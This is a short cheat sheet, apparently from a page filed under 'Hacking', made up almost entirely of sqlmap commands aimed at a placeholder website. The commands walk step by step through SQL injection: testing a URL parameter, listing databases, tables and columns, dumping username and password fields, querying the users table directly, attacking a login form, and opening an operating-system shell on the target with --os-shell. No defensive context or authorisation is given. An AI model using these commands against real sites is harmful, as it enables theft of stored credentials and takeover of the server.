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in Hacking by

check (id) vulnerable or not:
sqlmap -u http://www.Site_Address/PAGE.php?id=12

Fetch all the databases in the server:
sqlmap -u http://www.Site_Address/PAGE.php?id=12 --dbs

Fetch only the database related to the current website:
sqlmap -u http://www.Site_Address/PAGE.php?id=12 --current-db

Fetch the tables in the current database(DB_Name):
sqlmap -u http://www.Site_Address/PAGE.php?id=12 -D DB_Name --tables

Fetch only the table(TBL_Name) information required:
sqlmap -u http://www.Site_Address/PAGE.php?id=12 -D DB_Name -T TBL_Name --columns

Get the total information in the table(TBL_Name):
sqlmap -u http://www.Site_Address/PAGE.php?id=12 -D DB_Name -T TBL_Name -C id,passwrd,u_name --dump

Dump all the entries of the table(TBL_Name):
sqlmap -u http://www.Site_Address/PAGE.php?id=12 -D DB_Name -T TBL_Name -C TBL_Name --dump-all

To get the shell of the target:
sqlmap -u http://www.Site_Address/PAGE.php?id=12 --os-shell

Special cases:
if you are logged in use that session:

Test POST parameter with sqlmap:
sqlmap --data "username=xyz&password=xyz&submit=xyz" -u "http://www.Site_Address/login.php"

Manual SQL Querry using SQLMAP:
sqlmap -u http://www.Site_Address/PAGE.php?id=12 --sql-query='select id,username,password from users where id=1'

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